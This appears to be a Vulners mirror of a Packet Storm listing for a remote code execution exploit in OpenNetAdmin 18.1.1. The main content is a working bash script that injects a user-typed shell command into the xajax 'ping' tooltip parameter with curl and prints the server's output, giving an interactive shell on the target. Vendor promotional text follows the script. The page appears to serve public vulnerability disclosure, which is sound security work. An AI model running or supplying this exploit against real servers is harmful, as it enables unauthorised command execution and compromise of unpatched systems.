Lucene search
K

OpenNetAdmin 18.1.1 Remote Code Execution

🗓️ 20 Nov 2019 00:00:00Reported by mattpascoeType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 231 Views

OpenNetAdmin v18.1.1 RCE, Remote Code Executio

Code
`# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution  
# Date: 2019-11-19  
# Exploit Author: mattpascoe  
# Vendor Homepage: http://opennetadmin.com/  
# Software Link: https://github.com/opennetadmin/ona  
# Version: v18.1.1  
# Tested on: Linux  
  
# Exploit Title: OpenNetAdmin v18.1.1 RCE  
# Date: 2019-11-19  
# Exploit Author: mattpascoe  
# Vendor Homepage: http://opennetadmin.com/  
# Software Link: https://github.com/opennetadmin/ona  
# Version: v18.1.1  
# Tested on: Linux  
  
#!/bin/bash  
  
URL="${1}"  
while true;do  
echo -n "$ "; read cmd  
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1  
done  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation